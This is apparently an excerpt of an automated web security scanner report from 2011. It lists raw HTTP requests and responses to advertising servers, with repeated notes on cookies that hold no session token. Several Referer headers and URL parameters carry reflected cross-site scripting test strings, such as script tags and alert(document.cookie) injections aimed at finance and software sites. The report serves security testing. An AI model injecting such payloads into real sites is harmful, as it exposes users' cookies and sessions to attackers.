HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://weeklyad.staples.com/staples/new_user_entry.aspx?mode=flash&sneakpeek=y&cm_mmc=display_ads-_-WeeklyAd-_-WeeklyAd-_-MSN&cid=BAN:RETAIL:MSN:MSN:WEEKLYAD:20101201:WEEKLYADSNEAKPEEK:VARIOUS:N Set-Cookie: id=c8a488932000097|737194/848412/15003|t=1296344711|et=730|cs=pupuuvqs; path=/; domain=.doubleclick.net; expires=Mon, 28 Jan 2013 23:45:11 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 28 Jan 2011 23:45:11 GMT Date: Sat, 29 Jan 2011 23:45:11 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/353.23.js.120x30/** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;
Response
HTTP/1.1 302 Found Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 02:05:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 02:05:04 GMT; path=/ Set-Cookie: c_1=33:353:23:3:0:38345:1296353104:L|33:967:555:0:0:36941:1294800536:L; expires=Tue, 01-Mar-2011 02:05:04 GMT; path=/ Location: http://www.scottrade.com/lp/pc1/?cid=AM|33|353|23|3&rid=L|0&amvid=4d2cdd9abba1d P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/353.516.js.120x30/** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;
Response
HTTP/1.1 302 Found Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 02:05:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 02:05:10 GMT; path=/ Set-Cookie: c_1=33:353:516:3:0:38345:1296353110:L|33:967:555:0:0:36941:1294800536:L; expires=Tue, 01-Mar-2011 02:05:10 GMT; path=/ Location: http://www.scottrade.com/lp/7e/?cid=AM|33|353|516|3&rid=L|0&amvid=4d2cdd9abba1d P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:28:06 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:28:06 GMT; path=/ Set-Cookie: i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; expires=Tue, 01-Mar-2011 01:28:06 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 2438
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1359.827.tk.100x25/1209024888 HTTP/1.1 Accept: */* Referer: http://www.redacted/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: ad.wsod.com Proxy-Connection: Keep-Alive Cookie: u=4d1e80eb13df2; i_1=33:1359:827:0:0:37452:1295382870:L|33:971:560:0:0:37049:1294887076:L|33:971:560:0:0:36941:1294798634:L
Response
HTTP/1.1 302 Found Server: nginx/0.6.39 Date: Sat, 29 Jan 2011 23:26:33 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d1e80eb13df2; expires=Tue, 01-Mar-2011 23:26:33 GMT; path=/ Set-Cookie: i_1=33:1359:827:0:0:34115:1296343593:B2|33:1359:827:0:0:37452:1295382870:L|33:971:560:0:0:37049:1294887076:L; expires=Mon, 28-Feb-2011 23:26:33 GMT; path=/ Location: http://admedia.wsod.com/media/p.gif P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L
Response
HTTP/1.1 302 Found Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 13:00:21 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 13:00:21 GMT; path=/ Set-Cookie: fp=599362::7:IN:::1296392421:1:33; expires=Sat, 30-Apr-2011 13:00:21 GMT; path=/; domain=.wsod.com Set-Cookie: i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2; expires=Tue, 01-Mar-2011 13:00:21 GMT; path=/ Location: http://admedia.wsod.com/media/p.gif P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/36374631 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://money.redacted//?4ae1b Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2
Response
HTTP/1.1 302 Found Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 12:56:46 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 12:56:46 GMT; path=/ Set-Cookie: i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L; expires=Tue, 01-Mar-2011 12:56:46 GMT; path=/ Location: http://admedia.wsod.com/media/p.gif P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/708002109 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:782:100:0:34115:1296392450:B2|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2
Response
HTTP/1.1 302 Found Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 17:59:14 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 17:59:14 GMT; path=/ Set-Cookie: i_1=33:1391:261:95:0:34115:1296410354:B2|33:1411:782:100:0:34115:1296392450:B2|33:1411:972:100:0:34115:1296392427:B2; expires=Tue, 01-Mar-2011 17:59:14 GMT; path=/ Location: http://admedia.wsod.com/media/p.gif P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 13:00:27 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 13:00:27 GMT; path=/ Set-Cookie: i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 13:00:27 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 903
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd1 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 13:00:50 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 13:00:50 GMT; path=/ Set-Cookie: i_1=33:1411:782:100:0:34115:1296392450:B2|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 13:00:50 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 897
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296410362**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1478181591&PG=INV4QD&ASID=79478a5100d1453990870f5f8e2afde2 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1391:261:95:0:34115:1296410354:B2|33:1411:782:100:0:34115:1296392450:B2|33:1411:972:100:0:34115:1296392427:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 17:59:25 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 17:59:25 GMT; path=/ Set-Cookie: i_1=33:1411:992:100:0:34115:1296410365:B2|33:1391:261:95:0:34115:1296410354:B2|33:1411:782:100:0:34115:1296392450:B2; expires=Tue, 01-Mar-2011 17:59:25 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 885
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1478181591&PG=INV4QD&ASID=79478a5100d1453990870f5f8 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:27:28 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:27:28 GMT; path=/ Set-Cookie: i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:27:28 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 843
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:28:06 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:28:06 GMT; path=/ Set-Cookie: i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:28:06 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 842
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 12:56:47 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 12:56:47 GMT; path=/ Set-Cookie: i_1=33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 12:56:47 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 813
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183b ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel?id=1051114&t=1 HTTP/1.1 Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=uid=2c382b2c-154d-11e0-8090-001e6849f405&_hmacv=1&_salt=2076931618&_keyid=k1&_hmac=deb36388c0462f4f1745f3224a27addc34e20c73; pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#M*E!!E)$!$XwU!/uG1!%:2w!#:m1!?5%!'2gi6!xSD7!%4=%!%@78!'>cr~~~~~<jbOF<ka5`~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~"; lifb=%y_Qs7i<Qa5p0/:; ih="b!!!!7!(4vA!!!!#<kc#t!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF"; 